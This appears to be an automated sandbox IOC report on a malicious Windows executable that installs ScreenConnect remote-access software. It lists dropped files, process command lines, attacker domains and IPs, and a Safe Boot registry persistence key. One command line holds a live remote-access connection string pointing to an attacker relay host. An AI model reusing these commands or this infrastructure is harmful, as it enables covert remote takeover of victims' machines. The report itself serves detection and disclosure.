IOC Report
96r3GgxntQ.exe

loading gif

Files

File Path
Type
Category
Malicious
96r3GgxntQ.exe
PE32 executable (GUI) Intel 80386, for MS Windows
initial sample
 malicious
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_96r3GgxntQ.exe_183a24e280da4a38e54d6993e779d74f437fce42_1e18bb33_683ddce7-d285-483b-8fbd-7e2ea1f6255e\Report.wer
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
 malicious
C:\ProgramData\Microsoft\Network\Downloader\edb.log
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage engine DataBase, version 0x620, checksum 0xc7e8a32c, page size 16384, DirtyShutdown, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
data
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERA84.tmp.dmp
Mini DuMP crash report, 14 streams, Fri Oct 25 17:27:20 2024, 0x1205a4 type
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERBBD.tmp.WERInternalMetadata.xml
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERBED.tmp.xml
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERBFB.tmp.csv
data
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC4A.tmp.txt
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
Microsoft Cabinet archive data, Windows 2000/XP setup, 4770 bytes, 1 file, at 0x2c +A "disallowedcert.stl", number 1, 1 datablock, 0x1 compression
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1
Certificate, Version=3
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4
Certificate, Version=3
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
data
modified
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C56C4404C4DEF0DC88E5FCD9F09CB2F1
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2E248BEDDBB2D85122423C41028BFD4
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\manifests\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b.cdf-ms
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\manifests\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10073), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\manifests\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f.cdf-ms
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\manifests\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\manifests\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af.cdf-ms
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\manifests\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c.cdf-ms
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883.cdf-ms
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\manifests\scre..tion_25b0fbb6ef7eb094_0018.0002_none_394ffef6a8000aee.cdf-ms
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\manifests\scre..tion_25b0fbb6ef7eb094_0018.0002_none_394ffef6a8000aee.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63849), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\manifests\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea.cdf-ms
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\manifests\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.ClientService.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsBackstageShell.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsBackstageShell.exe.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsClient.exe.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsFileManager.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsFileManager.exe.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f\ScreenConnect.Core.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af\ScreenConnect.Windows.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883\ScreenConnect.Client.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\Client.Override.en-US.resources
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\Client.Override.resources
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\Client.en-US.resources
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\Client.resources
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\app.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\buxsurwv.newcfg
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\user.config (copy)
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea\ScreenConnect.ClientService.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dfsvc.exe.log
ASCII text, with CRLF line terminators
modified
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ScreenConnect.ClientService.exe.log
CSV text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\5W9VLRZG.log
Unicode text, UTF-16, little-endian text, with very long lines (620), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.Client.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.Client.dll.genman
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.ClientService.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.ClientService.dll.genman
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.ClientService.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.Core.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.Core.dll.genman
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.Windows.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.Windows.dll.genman
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.WindowsBackstageShell.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.WindowsBackstageShell.exe.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.WindowsClient.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.WindowsClient.exe.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.WindowsClient.exe.genman
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.WindowsClient.exe.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10073), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.WindowsFileManager.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.WindowsFileManager.exe.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\YTQ2XNTD.5QH\1L9EZ96X.6J5.application
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63849), with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\932a2db58c237abd381d22df4c63a04a_9e146be9-c76a-4720-bcdb-53011b87bd06
data
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
JSON data
dropped
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ScreenConnect.ClientService.exe.log
ASCII text, with CRLF line terminators
dropped
C:\Windows\appcompat\Programs\Amcache.hve
MS Windows registry file, NT/2000 or above
dropped
There are 68 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\96r3GgxntQ.exe
"C:\Users\user\Desktop\96r3GgxntQ.exe"
 malicious
C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
"C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe"
 malicious
C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe
"C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%2520Session" "1"
malicious
C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe
"C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%2520Session" "1"
malicious
C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
"C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe" "RunRole" "4e12b011-b423-4052-ba92-2560e19f3148" "User"
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 7608 -ip 7608
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7608 -s 864
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
There are 1 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://secure.stansup.com/Bin/ScreenConnect.Client.application.MO3RT
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.application9
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.applicationG
unknown
https://secure.staPJ
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.application9e0892
unknown
https://secure.stansup.com/Bin/ScreenConnect.WindowsBackstageShell.exe
79.110.49.185
https://g.live.com/odclientsettings/ProdV2.C:
unknown
https://secure.stansup.com/Bin/ScreenConnect.WindowsBackstageShell.exe.config
79.110.49.185
https://login.microsoftonline.com/ppsecure/ResolveUser.srf
unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-
unknown
https://secure.stansup.com
unknown
http://Passport.NET/tbA
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.applicationO3
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.application1
unknown
https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exe8
unknown
https://g.live.com/odclientsettings/Prod.C:
unknown
https://secure.stansup.c
unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.applicationGU
unknown
https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exe.config~&
unknown
https://secure.stansup.com/Bin/ScreenConnect.ClientService.exe(T
unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsds
unknown
https://login.microsoftonline.com/ppsecure/devicechangecredential.srf
unknown
https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exeNU
unknown
https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.application
unknown
https://account.live.com/InlineSignup.aspx?iww=1&id=80502
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.applicationX
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://secure.stansup.com/Bin/ScreenConnect.C
unknown
http://Passport.NET/tb_
unknown
https://secure.staPJh
unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdst=
unknown
https://secure.stansup.com/Bin/ScreenConnect.Windows.dllx
unknown
https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exe.configL
unknown
https://login.microsoftonline.com/ppsecure/DeviceQuery.srfsuer
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.dllI
unknown
https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exe.config
79.110.49.185
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.x
unknown
https://account.live.com/msangcwam
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.applicationMO3
unknown
https://secure.stansup.com/Bin/ScreenConnect.Windop
unknown
https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exe.config
79.110.49.185
http://www.w3.or
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.appl
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.manifest001O3
unknown
http://crl.ver)
unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdx
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.applicationn
unknown
http://passport.net/tb
unknown
https://secure.staP
unknown
https://secure.stansup.com/Bin/ScreenConnect.Core.dllY
unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/Issueue
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.applicationtv
unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsds
unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdxmlns:
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.applicationt
unknown
https://secure.stansup.com/Bin/ScreenConnect.Windo
unknown
https://secure.stansup.com/Bin/ScreenConnect.WindowsBackstageShell.exe=
unknown
https://secure.stansup.com/Bin/ScreenConnect.ClientService.exe
79.110.49.185
https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exe
79.110.49.185
https://account.live.com/msangcwame
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=kjh231a.zapto.or
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.dlla
unknown
https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exe.configj
unknown
http://schemas.xmlsoap.org/ws/20
unknown
https://secure.stansup.com/Bin/ScreenConnect.ClientService.dll
79.110.49.185
https://secure.stansup.com/Bin/ScreenConnect.Client.manifestM
unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAA
unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
unknown
https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exX
unknown
https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exeyU
unknown
https://secure.stansup.com/Bin/Scre
unknown
https://account.live.com/Wizard/Password/Change?id=806013
unknown
https://secure.staPb
unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/Issuesue
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.dll
79.110.49.185
http://schemas.xmlsoap.org/ws/2005/02/trust/Issuee0
unknown
https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf
unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/Issuee1
unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAA
unknown
https://login.microsoftonline.com/ppsecure/DeviceQuery.srf
unknown
http://schemas.xmlsoap.org/soap/envelope/
unknown
https://secure.stansup.com/Bin/ScreenConnect.WindowsBackstageShell.exex
unknown
http://schemas.xmlsoap.org/ws/2005/02/trust
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.application.MO3
unknown
https://login.microsoftonline.com/MSARST2.srf
unknown
http://Passport.NET/STS
unknown
https://secure.stansup.com/Bin/ScreenConnect.ClientService.dllkU9
unknown
http://docs.oasis-open.org/wss/2
unknown
http://www.w3.
unknown
http://www.xrml.org/schema/2001/11/xrml2coreS
unknown
https://account.live.com/InlineSignup.aspx?iww=1&id=80502ssuer
unknown
http://www.w3.o
unknown
https://secure.stansup.com/Bin/ScreenConnect.Windows.dll
79.110.49.185
http://Passport.NET/tb
unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.manifest
79.110.49.185
http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsd
unknown
There are 90 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
bg.microsoft.map.fastly.net
199.232.214.172
s-part-0017.t-0009.fb-t-msedge.net
13.107.253.45
secure.stansup.com
79.110.49.185
kjh231a.zapto.org
79.110.49.185
fp2e7a.wpc.phicdn.net
192.229.221.95

IPs

IP
Domain
Country
Malicious
127.0.0.1
unknown
unknown
79.110.49.185
secure.stansup.com
Germany

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\ScreenConnect Client (ae095c23-8e22-4747-b9a0-c8c8b34ba57d)
NULL
 malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C
Blob
HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579
Blob
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
ComponentStore_RandomString
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
ComponentStore_RandomString
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager
StateStore_RandomString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
ConsoleTracingMask
